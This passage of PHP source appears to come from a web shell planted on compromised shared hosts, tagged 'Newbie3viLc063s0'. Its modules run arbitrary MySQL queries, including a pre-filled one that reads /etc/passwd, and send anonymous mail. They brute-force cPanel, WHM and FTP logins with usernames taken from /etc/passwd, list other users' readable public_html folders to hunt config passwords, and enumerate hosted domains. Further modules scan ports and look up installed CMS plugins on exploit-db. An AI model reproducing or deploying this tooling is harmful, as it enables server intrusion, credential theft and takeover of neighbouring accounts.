  720. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;
  721. <a href=\"y=".$pwd."&amp;x=mysql&amp;
  722. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  723. sqlpass=".$sqlpass."&amp;
  724. sqlport=".$sqlport."&amp;
  725. db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  726. if(isset($_GET['table']))
  727. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;
  728. </span>&nbsp;&nbsp;
  729. <a href=\"y=".$pwd."&amp;x=mysql&amp;
  730. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  731. sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;
  732. db=".$_GET['db']."&amp;
  733. table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  734. $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  735. $msg .= "</div>";
  736. echo $msg;
  737. if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery'])))
  738. {
  739. $db = $_GET['db'];
  740. $query = "DROP TABLE IF EXISTS Newbie3viLc063s0_table;
  741. \nCREATE TABLE `Newbie3viLc063s0_table` ( `file` LONGBLOB NOT NULL );
  742. \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM Newbie3viLc063s0_table;
  743. \nDROP TABLE IF EXISTS Newbie3viLc063s0_table;";
  744. $msg = "<div style=\"width:99%;padding:0 10px;\">
  745. <form action=\"?\" method=\"get\">
  746. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  747. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  748. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  749. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  750. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  751. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  752. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  753. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  754. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  755. </form>
  756. </div> ";
  757. $tables = array();
  758. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>";
  759. $hasil = @mysql_list_tables($db,$con);
  760. while(list($table) = @mysql_fetch_row($hasil))
  761. { @array_push($tables,$table); }
  762. @sort($tables);
  763. foreach($tables as $table)
  764. {
  765. $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>";
  766. }
  767. $msg .= "</table>";
  768. }
  769. elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
  770. {
  771. $db = $_GET['db'];
  772. $table = $_GET['table'];
  773. $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
  774. $msgq = "<div style=\"width:99%;padding:0 10px;\">
  775. <form action=\"?\" method=\"get\">
  776. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  777. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  778. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  779. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  780. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  781. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  782. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  783. <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  784. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  785. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  786. </form>
  787. </div> ";
  788. $columns = array();
  789. $msg = "<table class=\"explore\" style=\"width:99%;\">";
  790. $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
  791. while(list($column) = @mysql_fetch_row($hasil))
  792. {
  793. $msg .= "<th>$column</th>"; $kolum = $column;
  794. }
  795. $msg .= "</tr>";
  796. $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  797. list($total) = mysql_fetch_row($hasil);
  798. if(isset($_GET['z'])) $page = (int) $_GET['z'];
  799. else $page = 1;
  800. $pagenum = 100;
  801. $totpage = ceil($total / $pagenum);
  802. $start = (($page - 1) * $pagenum);
  803. $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  804. while($datas = @mysql_fetch_assoc($hasil))
  805. {
  806. $msg .= "<tr>";
  807. foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; }
  808. $msg .= "</tr>";
  809. }
  810. $msg .= "</table>";
  811. $head = "<div style=\"padding:10px 0 0 6px;\">
  812. <form action=\"?\" method=\"get\">
  813. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  814. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  815. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  816. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  817. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  818. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  819. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  820. <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  821. Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  822. for($i = 1;$i <= $totpage;$i++)
  823. {
  824. $head .= "<option value=\"".$i."\">".$i."</option>";
  825. if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
  826. }
  827. $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
  828. $msg = $msgq.$head.$msg;
  829. }
  830. elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != ""))
  831. {
  832. $db = $_GET['db'];
  833. $query = magicboom($_GET['sqlquery']);
  834. $msg = "<div style=\"width:99%;padding:0 10px;\">
  835. <form action=\"?\" method=\"get\">
  836. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  837. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  838. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  839. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  840. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  841. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  842. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  843. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  844. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  845. </form>
  846. </div> ";
  847. @mysql_select_db($db);
  848. $querys = explode(";",$query);
  849. foreach($querys as $query)
  850. {
  851. if(trim($query) != "")
  852. {
  853. $hasil = mysql_query($query);
  854. if($hasil)
  855. {
  856. $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
  857. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  858. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
  859. for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
  860. $msg .= "</tr>";
  861. for($i=0;$i<@mysql_num_rows($hasil);$i++)
  862. {
  863. $rows=@mysql_fetch_array($hasil);
  864. $msg .= "<tr>";
  865. for($j=0;$j<@mysql_num_fields($hasil);$j++)
  866. {
  867. if($rows[$j] == "") $dataz = "&nbsp;";
  868. else $dataz = $rows[$j];
  869. $msg .= "<td>".$dataz."</td>";
  870. }
  871. $msg .= "</tr>";
  872. }
  873. $msg .= "</table>";
  874. }
  875. else
  876. $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
  877. }
  878. }
  879. }
  880. else
  881. {
  882. $query = "SHOW PROCESSLIST;\n
  883. SHOW VARIABLES;\n
  884. SHOW STATUS;";
  885. $msg = "<div style=\"width:99%;padding:0 10px;\">
  886. <form action=\"?\" method=\"get\">
  887. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  888. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  889. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  890. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  891. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  892. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  893. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  894. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  895. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  896. </form>
  897. </div> ";
  898. $dbs = array();
  899. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  900. $hasil = @mysql_list_dbs($con);
  901. while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
  902. @sort($dbs);
  903. foreach($dbs as $db)
  904. {
  905. $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>";
  906. }
  907. $msg .= "</table>";
  908. }
  909. @mysql_close($con);
  910. }
  911. else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  912. echo $msg;
  913. }
  914. else
  915. {
  916. ?>
  917. <form action="?" method="get">
  918. <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
  919. <input type="hidden" name="x" value="mysql" />
  920. <table class="tabnet" style="width:300px;">
  921. <tr>
  922. <th colspan="2">Connect to mySQL server</th>
  923. </tr>
  924. <tr>
  925. <td>&nbsp;&nbsp;Host</td>
  926. <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
  927. </tr>
  928. <tr>
  929. <td>&nbsp;&nbsp;Username</td>
  930. <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
  931. </tr>
  932. <tr>
  933. <td>&nbsp;&nbsp;Password</td>
  934. <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td>
  935. </tr>
  936. <tr>
  937. <td>&nbsp;&nbsp;Port</td>
  938. <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
  939. </tr>
  940. </table>
  941. </form>
  942. <?php
  943. }
  944. }
  945. elseif(isset($_GET['x']) && ($_GET['x'] == 'mail'))
  946. {
  947. if(isset($_POST['mail_send']))
  948. {
  949. $mail_to = $_POST['mail_to'];
  950. $mail_from = $_POST['mail_from'];
  951. $mail_subject = $_POST['mail_subject'];
  952. $mail_content = magicboom($_POST['mail_content']);
  953. if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
  954. { $msg = "email sent to $mail_to"; }
  955. else $msg = "send email failed";
  956. }
  957. ?>
  958. <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  959. <table class="cmdbox">
  960. <tr>
  961. <td>
  962. <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey admin, please patch your site :)</textarea>
  963. </td>
  964. </tr>
  965. <tr>
  966. <td>
  967. &nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to
  968. </td>
  969. </tr>
  970. <tr>
  971. <td>
  972. &nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />
  973. &nbsp; from
  974. </td>
  975. </tr>
  976. <tr>
  977. <td>
  978. &nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject
  979. </td>
  980. </tr>
  981. <tr>
  982. <td>
  983. &nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" />
  984. </td>
  985. </tr>
  986. <tr>
  987. <td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?>
  988. </td>
  989. </tr>
  990. </table>
  991. </form>
  992. <?php
  993. }
  994. elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
  995. {
  996. ?>
  997. <form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
  998. <?php
  999. //bruteforce
  1000. @ini_set('memory_limit', 999999999999);
  1001. $connect_timeout=5;
  1002. @set_time_limit(0);
  1003. $pokeng = $_REQUEST['submit'];
  1004. $hn = $_REQUEST['users'];
  1005. $crew = $_REQUEST['passwords'];
  1006. $pasti = $_REQUEST['sasaran'];
  1007. $manualtarget = $_REQUEST['target'];
  1008. $bisa = $_REQUEST['option'];
  1009. if($pasti == ''){
  1010. $pasti = 'localhost';
  1011. }
  1012. if($manualtarget == ''){
  1013. $manualtarget = 'http://localhost:2082';
  1014. }
  1015.  
  1016. function get_users()
  1017. {
  1018. $users = array();
  1019. $rows=file('/etc/passwd');
  1020. if(!$rows) return 0;
  1021. foreach ($rows as $string)
  1022. {
  1023. $user = @explode(":",$string);
  1024. if(substr($string,0,1)!='#') array_push($users,$user[0]);
  1025. }
  1026. return $users;
  1027. }
  1028.  
  1029. if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
  1030. else
  1031. {
  1032. print " <div align='center'>
  1033. <form method='post' style='border: 1px solid #000000'><br><br>
  1034. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1>
  1035. <tr>
  1036. <td>
  1037. <b> Target ! : </font><input type='text' name='sasaran' size='16' value= $pasti class='inputz'></p></font></b></p>
  1038. <div align='center'><br>
  1039. <TABLE style='BORDER-COLLAPSE: collapse'
  1040. cellSpacing=0
  1041. borderColorDark=#666666
  1042. cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  1043. <tr> <td align='center'> <b>User</b></td> <td> <p align='center'> <b>Pass</b></td>
  1044. </tr>
  1045. </table>
  1046. <p align='center'>
  1047. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  1048. foreach($users as $user) { echo $user."\n"; }
  1049. print"</textarea>
  1050. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>
  1051. <br>
  1052. <b>Sila pilih : </span><input name='option' value='manual' style='font-weight: 700;' type='radio'> Manual Target Brute : <input type='text' name='target' size='16' class='inputz' value= $manualtarget ><br />
  1053. <input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  1054. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp
  1055. <input name='option' value='whm' style='font-weight: 700;' type='radio'> whm ==> <input type='submit' value='Brute !' name='submit' class='inputzbut'></p>
  1056. </td></tr></table></td></tr></form><p align= 'left'>";
  1057. }
  1058. ?>
  1059. <?php
  1060.  
  1061. function manual_check($anjink,$asu,$babi,$lonte){
  1062. $ch = curl_init();
  1063. curl_setopt($ch, CURLOPT_URL, "$anjink");
  1064. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1065. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1066. curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1067. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1068. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1069. $data = curl_exec($ch);
  1070. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1071. elseif ( curl_errno($ch) == 0 ){
  1072. print "<b>[ Newbie3viLc063s0@email ]# </b> <b>Completed , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1073. }
  1074. curl_close($ch);
  1075. }
  1076.  
  1077.  
  1078. function ftp_check($link,$user,$pswd,$timeout){
  1079. $ch = curl_init();
  1080. curl_setopt($ch, CURLOPT_URL, "ftp://$link");
  1081. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1082. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1083. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  1084. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pswd");
  1085. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1086. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1087. $data = curl_exec($ch);
  1088. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit; }
  1089. elseif ( curl_errno($ch) == 0 ){
  1090. print "<b>serangan selesai , username = <font color='#FF0000'> $user </font> dan passwordnya = <font color='#FF0000'> $pswd </font></b><br>";
  1091. }
  1092. curl_close($ch);
  1093. }
  1094.  
  1095. function cpanel_check($anjink,$asu,$babi,$lonte){
  1096. $ch = curl_init();
  1097. curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082");
  1098. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1099. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1100. curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1101. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1102. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1103. $data = curl_exec($ch);
  1104. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1105. elseif ( curl_errno($ch) == 0 ){
  1106. print "<b>[ Newbie3viLc063s@email ]# </b> <b>Completed, Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1107. }
  1108. curl_close($ch);
  1109. }
  1110.  
  1111. function whm_check($anjink,$asu,$babi,$lonte){
  1112. $ch = curl_init();
  1113. curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086");
  1114. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1115. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1116. curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1117. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1118. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1119. $data = curl_exec($ch);
  1120. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1121. elseif ( curl_errno($ch) == 0 )
  1122. {
  1123. print "<b>[ " . TITLE . " ]# </b> <b>Selesai , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1124. }
  1125. curl_close($ch);
  1126. }
  1127.  
  1128. if(isset($pokeng) && !empty($pokeng))
  1129. {
  1130. $userlist = explode ("\n" , $hn );
  1131. $passlist = explode ("\n" , $crew );
  1132. print "<b>[ " . TITLE . " ]# </b> ATTACK...!!! </font></b><br>";
  1133. foreach ($userlist as $asu)
  1134. {
  1135. $_user = trim($asu);
  1136. foreach ($passlist as $babi )
  1137. {
  1138. $_pass = trim($babi);
  1139. if ($bisa == "manual")
  1140. { manual_check($manualtarget,$_user,$_pass,$lonte); }
  1141. if($bisa == "ftp")
  1142. { ftp_check($pasti,$_user,$_pass,$lonte); }
  1143. if ($bisa == "cpanel")
  1144. { cpanel_check($pasti,$_user,$_pass,$lonte); }
  1145. if ($bisa == "whm")
  1146. { whm_check($pasti,$_user,$_pass,$lonte); }
  1147. }
  1148. }
  1149. }
  1150. }
  1151.  
  1152. //bruteforce
  1153.  
  1154. elseif(isset($_GET['x']) && ($_GET['x'] == 'readable'))
  1155. {
  1156. ?>
  1157. <form action="?y=<?php echo $pwd; ?>&amp;x=readable" method="post">
  1158. <?php
  1159.  
  1160. //radable public_html
  1161. echo '<html><head><title>Newbie3viLc063s Cpanel Finder</title></head><body>';
  1162. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1163. set_time_limit(0);
  1164. ###################
  1165. @$passwd = fopen('/etc/passwd','r');
  1166. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1167. $pub = array();
  1168. $users = array();
  1169. $conf = array();
  1170. $i = 0;
  1171. while(!feof($passwd))
  1172. {
  1173. $str = fgets($passwd);
  1174. if ($i > 35)
  1175. {
  1176. $pos = strpos($str,':');
  1177. $username = substr($str,0,$pos);
  1178. $dirz = '/home/'.$username.'/public_html/';
  1179. if (($username != ''))
  1180. {
  1181. if (is_readable($dirz))
  1182. {
  1183. array_push($users,$username);
  1184. array_push($pub,$dirz);
  1185. }
  1186. }
  1187. }
  1188. $i++;
  1189. }
  1190.  
  1191. ###################
  1192. echo '<br><br>';
  1193. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
  1194. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br />";
  1195. echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
  1196. foreach ($users as $user)
  1197. {
  1198. $path = "/home/$user/public_html/";
  1199. echo "<a href='?y&#61;$path' target='_blank' style='text-shadow:0px 0px 10px #12E12E; font-weight:bold; color:#FF0000;'>$path</a><br><br><br>";
  1200. }
  1201. echo "\n";
  1202. echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n"."<br />";
  1203. echo "[+] Complete...\n"."<br />";
  1204. echo '<br><br></b>
  1205. </body>
  1206. </html>';
  1207.  
  1208. }
  1209.  
  1210. elseif(isset($_GET['x']) && ($_GET['x'] == 'localdomain'))
  1211. {
  1212. ?>
  1213. <form action="?y=<?php echo $pwd; ?>&amp;x=localdomain" method="post">
  1214. <?php
  1215.  
  1216. //radable public_html
  1217.  
  1218. echo "<br><br>";
  1219. $file = @implode(@file("/etc/named.conf"));
  1220. if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  1221. preg_match_all("#named/(.*?).db#",$file ,$r);
  1222. $domains = array_unique($r[1]);
  1223.  
  1224. function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  1225.  
  1226. check();
  1227.  
  1228. echo "<table align=center border=1 width=59% cellpadding=5>
  1229. <tr><td colspan=2>[+] Here We Have : [<font face=calibri size=4 style=color:#FF0000>".count($domains)."</font>] Listed Domains In localhost.</td></tr>
  1230. <tr><td><b>List Of Users</b></td><td><b><font style=color:#0015FF;List Of Domains</b></td></tr>";
  1231.  
  1232. foreach($domains as $domain)
  1233. {
  1234. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1235. echo "<tr><td><a href='http://www.$domain' target='_blank' style='text-shadow:0px 0px 10px #CC2D4B; font-weight:bold; color:#FF002F;'>$domain</a></td><td>".$user['name']."</td></tr>";
  1236. }
  1237.  
  1238. echo "</table>";
  1239. //radable public_html
  1240. }
  1241.  
  1242. elseif(isset($_GET['x']) && ($_GET['x'] == 'port-scanner'))
  1243. {
  1244. ?>
  1245. <form action="?y=<?php echo $pwd; ?>&amp;x=port-scanner" method="post">
  1246. <?php
  1247.  
  1248. echo '<br><br><center><br><b>Port Scanner</b><br>';
  1249. $start = strip_tags($_POST['start']);
  1250. $end = strip_tags($_POST['end']);
  1251. $host = strip_tags($_POST['host']);
  1252.  
  1253. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  1254. for($i = $start; $i<=$end; $i++){
  1255. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  1256. if($fp){
  1257. echo 'Port '.$i.' is <font color=green>open</font><br>';
  1258. }
  1259. flush();
  1260. }
  1261. }else{
  1262.  
  1263. echo '
  1264. <input type="hidden" name="y" value="phptools">
  1265. Host:<br />
  1266. <input type="text" style="color:#FF0000;background-color:#000000" name="host" value="localhost"/><br />
  1267. Port start:<br />
  1268. <input type="text" style="color:#FF0000;background-color:#000000" name="start" value="0"/><br />
  1269. Port end:<br />
  1270. <input type="text" style="color:#FF0000;background-color:#000000" name="end" value="5000"/><br />
  1271. <input type="submit" style="color:#FF0000" value="Scan Ports" />
  1272. </form></center>';
  1273. }
  1274. }
  1275.  
  1276. elseif(isset($_GET['x']) && ($_GET['x'] == 'cms-scanner'))
  1277. {
  1278. ?>
  1279. <form action="?y=<?php echo $pwd; ?>&amp;x=cms-scanner" method="post">
  1280.  
  1281. <?php
  1282.  
  1283. function ask_exploit_db($component){
  1284.  
  1285. $exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  1286.  
  1287. $result = @file_get_contents($exploitdb);
  1288.  
  1289. if (eregi("No results",$result)) {
  1290.  
  1291. echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
  1292.  
  1293. }else{
  1294.  
  1295. echo"<td><a href='$exploitdb'>Found ..!</a></td><td><--</td></tr>";
  1296.  
  1297. }
  1298. }
  1299.  
  1300. /**************************************************************/
  1301. /* Joomla Conf */
  1302.  
  1303. function get_components($site){
  1304.  
  1305. $source = @file_get_contents($site);
  1306.  
  1307. preg_match_all('{option,(.*?)/}i',$source,$f);
  1308. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  1309. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  1310.  
  1311. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1312.  
  1313. $coms=array();
  1314.  
  1315. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  1316.  
  1317. foreach(array_unique($arz) as $x){
  1318.  
  1319. $coms[]=$x;
  1320. }
  1321.  
  1322. foreach($coms as $comm){
  1323.  
  1324. echo "<tr><td>$comm</td>";
  1325.  
  1326. ask_exploit_db($comm);
  1327.  
  1328. }
  1329.  
  1330. }
  1331.  
  1332. /**************************************************************/
  1333. /* WP Conf */
  1334.  
  1335. function get_plugins($site){
  1336.  
  1337. $source = @file_get_contents($site);
  1338.  
  1339. preg_match_all("#/plugins/(.*?)/#i", $source, $f);
  1340.  
  1341. $plugins=array_unique($f[1]);
  1342.  
  1343. if(count($plugins)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  1344.  
  1345. foreach($plugins as $plugin){
  1346.  
  1347. echo "<tr><td>$plugin</td>";
  1348.  
  1349. ask_exploit_db($plugin);
  1350.  
  1351. }
  1352.  
  1353. }
  1354.  
  1355. /**************************************************************/
  1356. /* Nuke's Conf */
  1357.  
  1358. function get_numod($site){
  1359.  
  1360. $source = @file_get_contents($site);
  1361.  
  1362. preg_match_all('{?name=(.*?)/}i',$source,$f);
  1363. preg_match_all('{?name=(.*?)(&amp;|&|l_op=")}i',$source,$f2);
  1364. preg_match_all('{/modules/(.*?)/}i',$source,$f3);
  1365.  
  1366. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1367.  
  1368. $coms=array();
  1369.  
  1370. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  1371.  
  1372. foreach(array_unique($arz) as $x){
  1373.  
  1374. $coms[]=$x;
  1375. }
  1376.  
  1377. foreach($coms as $nmod){
  1378.  
  1379. echo "<tr><td>$nmod</td>";
  1380.  
  1381. ask_exploit_db($nmod);
  1382.  
  1383. }
  1384.  
  1385. }
  1386.  
  1387. /*****************************************************/
  1388. /* Xoops Conf */
  1389.  
  1390. function get_xoomod($site){
  1391.  
  1392. $source = @file_get_contents($site);
  1393.  
  1394. preg_match_all('{/modules/(.*?)/}i',$source,$f);
  1395.  
  1396. $arz=array_merge($f[1]);
  1397.  
  1398. $coms=array();
  1399.  
  1400. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  1401.  
  1402. foreach(array_unique($arz) as $x){
  1403.  
  1404. $coms[]=$x;
  1405. }
  1406.  
  1407. foreach($coms as $xmod){
  1408.  
  1409. echo "<tr><td>$xmod</td>";
  1410.  
  1411. ask_exploit_db($xmod);
  1412.  
  1413. }
  1414.  
  1415. }
  1416.  
  1417. /**************************************************************/
  1418. /* Header */
  1419. function t_header($site){
  1420.  
  1421. echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">';
  1422.  
  1423. echo'
  1424. <tr id="oo">
  1425. <td>Site : <a href="'.$site.'">'.$site.'</a></td>
  1426. <td>Exploit-db</b></td>
